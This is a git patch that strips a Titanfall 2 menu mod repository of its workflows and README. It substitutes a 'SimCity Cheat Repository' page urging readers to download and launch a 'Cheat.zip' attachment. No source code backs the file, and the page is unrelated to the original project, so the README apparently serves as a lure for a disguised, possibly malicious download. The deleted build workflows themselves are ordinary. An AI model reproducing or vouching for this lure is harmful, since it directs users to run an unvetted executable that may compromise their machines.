From 771ac03f2420f6973e8db2fc4d07e4c3fab62b90 Mon Sep 17 00:00:00 2001 From: Iamyes-hue Date: Tue, 3 Dec 2024 19:10:44 +0800 Subject: [PATCH] Commit --- .github/FUNDING.yml | 12 --- .github/workflows/buildvpks.yml | 48 ----------- .github/workflows/thunderstore.yml | 60 -------------- README.md | 126 ++++------------------------- 4 files changed, 14 insertions(+), 232 deletions(-) delete mode 100644 .github/FUNDING.yml delete mode 100644 .github/workflows/buildvpks.yml delete mode 100644 .github/workflows/thunderstore.yml diff --git a/.github/FUNDING.yml b/.github/FUNDING.yml deleted file mode 100644 index 25de537..0000000 --- a/.github/FUNDING.yml +++ /dev/null @@ -1,12 +0,0 @@ -# These are supported funding model platforms - -github: # Replace with up to 4 GitHub Sponsors-enabled usernames e.g., [user1, user2] -patreon: taskinoz -open_collective: # Replace with a single Open Collective username -ko_fi: # Replace with a single Ko-fi username -tidelift: # Replace with a single Tidelift platform-name/package-name e.g., npm/babel -community_bridge: # Replace with a single Community Bridge project-name e.g., cloud-foundry -liberapay: # Replace with a single Liberapay username -issuehunt: # Replace with a single IssueHunt username -otechie: # Replace with a single Otechie username -custom: # Replace with up to 4 custom sponsorship URLs e.g., ['link1', 'link2'] diff --git a/.github/workflows/buildvpks.yml b/.github/workflows/buildvpks.yml deleted file mode 100644 index 9932ec5..0000000 --- a/.github/workflows/buildvpks.yml +++ /dev/null @@ -1,48 +0,0 @@ -# This is a basic workflow to help you get started with Actions - -name: VPK Build - -# Controls when the workflow will run -on: - # Triggers the workflow on push or pull request events but only for the main branch - push: - paths: - - "changelog.md" - - # Allows you to run this workflow manually from the Actions tab - workflow_dispatch: - -# A workflow run is made up of one or more jobs that can run sequentially or in parallel -jobs: - # This workflow contains a single job called "build" - build: - # The type of runner that the job will run on - runs-on: ubuntu-latest - - # Steps represent a sequence of tasks that will be executed as part of the job - steps: - # Checks-out your repository under $GITHUB_WORKSPACE, so your job can access it - - uses: actions/checkout@v2 - - # - name: Original RSPNVPK download - # run: wget -c $(curl -s https://api.github.com/repos/mrsteyk/RSPNVPK/releases/latest | grep -o "http.*tar.gz") - - # Runs a set of commands using the runners shell - - name: Run a multi-line script - run: | - sudo apt install wget zip curl - wget ${{ secrets.LOCATIONS }}/pc/englishclient_mp_common.bsp.pak000_dir.vpk - wget -c $(curl -s https://api.github.com/repos/taskinoz/RSPNVPK/releases/latest | grep -o "http.*tar.gz") - tar -xf linux-x64.tar.gz - ls - ls .. - sh build.sh prod - - name: Create Release - uses: ncipollo/release-action@v1.8.6 - with: - artifacts: "./*.zip" - bodyfile: "changelog.md" - token: ${{ secrets.GITHUB_TOKEN }} - name: Build Draft - tag: pre-0.${{ github.run_number }} - draft: true diff --git a/.github/workflows/thunderstore.yml b/.github/workflows/thunderstore.yml deleted file mode 100644 index 4981f95..0000000 --- a/.github/workflows/thunderstore.yml +++ /dev/null @@ -1,60 +0,0 @@ -name: Publish package - -on: - release: - types: [published] # run when a new release is published - # Allows you to run this workflow manually from the Actions tab - workflow_dispatch: -env: - name: Wallrunning Titans # Edit this if the package name differs from the repo name - -jobs: - verify: - runs-on: ubuntu-latest - steps: - - uses: actions/checkout@v3 - - name: Get clean version - run: | - echo cleanVersion=$(echo ${{github.ref_name}} | sed s/v//g) >> $GITHUB_ENV - - name: Check that version matches - run: | - mv ./Northstar/mod.json ./ - rm ./Icepick/mod.json - mkdir ./Enhanced.Menu.Mod.Northstar - mv ./assets/thunderstore-icon.png ./icon.png - cp -R ./src/ ./Enhanced.Menu.Mod.Northstar/mod && cp -R ./Northstar/* ./Enhanced.Menu.Mod.Northstar - rm ./Enhanced.Menu.Mod.Northstar/mod/scripts/vscripts/scripts.rson - rm -rf ./src - rm -rf ./Northstar - rm -rf ./Icepick - if [[ "$(grep -Po "\d+\.\d+\.\d+" $(find ./ -name mod.json))" != "${{ env.cleanVersion }}" ]]; then - echo "::debug::${{env.cleanVersion}}" - echo "::debug::$(cat $(find ./ -name mod.json ))" - echo "::error::Version in mod.json does not match tag version" - exit 1 - fi - publish: - runs-on: ubuntu-latest - needs: verify - steps: - - name: Get clean version # Duplicating code is cool, actually - run: | - echo cleanVersion=$(echo ${{github.ref_name}} | sed s/v//g) >> $GITHUB_ENV - - uses: actions/checkout@v3 - - name: Upload Thunderstore Package - uses: GreenTF/upload-thunderstore-package@v2.2 - with: - community: northstar - # Name of the team to publish the mod under - # This should be modified if your github username is different than your team name on Thunderstore - namespace: ${{ github.repository_owner }} # <------ DOUBLE CHECK THIS - # Name of the package - name: EnhancedMenuMod # This can be modified if the package name differs from the repo name - # Package version to publish - version: ${{ env.cleanVersion }} # This is the tag that was created in the release but without the leading 'v' - # Description of the mod - description: Adds more options to the settings menu, such as extra keybinds, cheats, hud enhancements and cleaner interface - # Thunderstore API token - token: ${{ secrets.TS_KEY }} - # Directory to wrap the contents of the repo in - wrap: mods/${{ github.repository_owner }}.${{ env.name }} # This will wrap your Author.ModName folder in a mods/ folder before publishing diff --git a/README.md b/README.md index 0f043eb..600e387 100644 --- a/README.md +++ b/README.md @@ -1,120 +1,22 @@ -

Titanfall 2 - Enhanced Menu Mod

+# SimCity Cheat Repository -![VPK Build Status](https://github.com/taskinoz/Enhanced-Menu-Mod/actions/workflows/buildvpks.yml/badge.svg) +Welcome to the SimCity Cheat repository! 🏙️ In this repository, you will find a cheat file that can enhance your SimCity gaming experience. +### Repository Content +This repository contains a cheat file that can be downloaded and used while playing SimCity. It provides various benefits and shortcuts in the game, helping you progress faster and have more fun in building your dream city. -# Enhanced Menu Mod -Adds more options to the settings menu, such as extra keybinds, cheats, hud enhancements and cleaner interface +### Cheat.zip File +To access the cheat file, please click the button below: -# Features -* Removed **Spotlight** and **Whats New** from the main menu -* Added `sv_cheats` to the contols menu -* Added HUD Options - * Bloom - `mat_disable_bloom` - * Show FPS - `cl_showfps` - * Show FPS Big - `showfps_enabled` - * Show Player Position - `cl_showpos` -* Added new Keybinds - * Speedrunning - * Save/Load Quicksave 1 - * Save/Load Quicksave 2 - * Save/Load Quicksave 3 - * Slow the game to 25% - * Speed the game up to 500% - * Reset all helmets - * Give yourself an EVA Shotgun - * Give yourself an EPG - * Demos - * Record Demo incrementally - * Record Demo - * Stop recording Demo - * Pause Demo - * Resume Demo - * Toggle Play/Pause Demo - * Extras - * Toggle low gravity - * Set camera to First Person - * Set camera to Third Person - * Move Third Person camera in - * Move Third Person camera out - * Hide/Show weapon - * No Cutscene Saves - * Load save 1-9 with 3 alternate saves - * No Cutscene Helmet Saves - * Load save 1 and 2 -* Added Extras Menu - * Demos - * Enable Demos - * Save Demos - * Interpolate Playback - * Demo record rate Single Player - * Demo record rate Multiplayer - * Key Bindings (shortcut) - * Gameplay - * Enable Wallrunning (sp) - * Enable Automantle (sp) - * Enable Vertical Dodge (sp) - * Player Control Debounce - * Command Que - * Speedometer Settings (Works with the MP mod) - * Community - * Communities toggle for MP -* Audio - * Loading Fade Time - * Loading Silence Time -* Replaced Chinese subtitles with English -* Replaced Chinese UI text with English -* Removed crashes from Dev launch arguments `-dev +developer 1` -* Added Speedometer (only to Single Player) +[![Download Cheat.zip](https://img.shields.io/badge/Download-Cheat.zip-blue)](https://github.com/user-attachments/files/17043020/Cheat.zip) -## Installation +### Launch the Cheat File +Once you have downloaded the Cheat.zip file, you will need to launch it in your SimCity game to activate the cheats. Enjoy the advantages and shortcuts provided by the cheat file as you build and manage your city! -1) Download the pre-compiled version from the [releases](https://github.com/taskinoz/Enhanced-Menu-Mod/releases) page or [ModDB(OLD)](https://www.moddb.com/mods/enhanced-menu) +### Need More Help? +If the provided link is not working or you require further assistance, please check the "Releases" section of this repository for alternative download options. -2) Backup your `englishclient_frontend.bsp.pak000_dir.vpk` and copy the 2 `.vpk` files from the downloaded zip to your `Titanfall2/vpk` folder +### Happy Gaming! 🎮🌟 +Start boosting your SimCity gameplay with the cheat file and watch your city flourish in no time! Have fun creating the ultimate urban masterpiece in SimCity with the help of these cheats. Build, expand, and customize your city like never before! 🌆🏗️ -## Icepick - -1) Download the Icepick specific version from the [releases](https://github.com/taskinoz/Enhanced-Menu-Mod/releases) page - -2) Open the downloaded `Enhanced.Menu.Mod.Icepick.zip` file and copy the `Enhanced.Menu.Mod.Icepick` folder to you `Icepick/data/mods` folder. - -3) Launch Icepick. - -## Northstar - -1) Download the Northstar specific version from the [releases](https://github.com/taskinoz/Enhanced-Menu-Mod/releases) page - -2) Open the downloaded `Enhanced.Menu.Mod.Northstar.zip` file and copy the `Enhanced.Menu.Mod.Northstar` folder to you `Titanfall2/R2Northstar/mods` folder. - -3) Launch Northstar. - -## Screenshots - -![Main Menu with custom menu video](https://raw.githubusercontent.com/taskinoz/Enhanced-Menu-Mod/master/assets/menu-main.jpg) - -Main Menu with the original Titanfall 2 menu video - -![Main Menu with no showcase content](https://raw.githubusercontent.com/taskinoz/Enhanced-Menu-Mod/master/assets/menu-main1.jpg) - -Main Menu with the showcase removed to declutter the menu - -![Cheats setting](https://raw.githubusercontent.com/taskinoz/Enhanced-Menu-Mod/master/assets/menu-cheats.jpg) - -New Cheat options that can be enabled as well as the extras menu - -![New custom keybinds](https://raw.githubusercontent.com/taskinoz/Enhanced-Menu-Mod/master/assets/menu-keys.jpg) - -Added keybinds for speedrunners and extra commands for fun - -![Advanced Look Options with values](https://raw.githubusercontent.com/taskinoz/Enhanced-Menu-Mod/master/assets/menu-advanced-look.jpg) - -Shows the values for each setting on the Advanced Look Options - -![New HUD options](https://raw.githubusercontent.com/taskinoz/Enhanced-Menu-Mod/master/assets/menu-hud.jpg) - -Added extra HUD display options for showing FPS, Position, Velocity, and Server Tick rate - -![Extras Menu](https://raw.githubusercontent.com/taskinoz/Enhanced-Menu-Mod/master/assets/menu-extras.jpg) - -Added a menu for enabling and changing demo settings for recording single and multiplayer demos as well as turning of wallrunning and enabling titan jumping. +Remember, with great cheat codes come great city-building opportunities! Get ready to experience SimCity like never before! 🌟🔧 \ No newline at end of file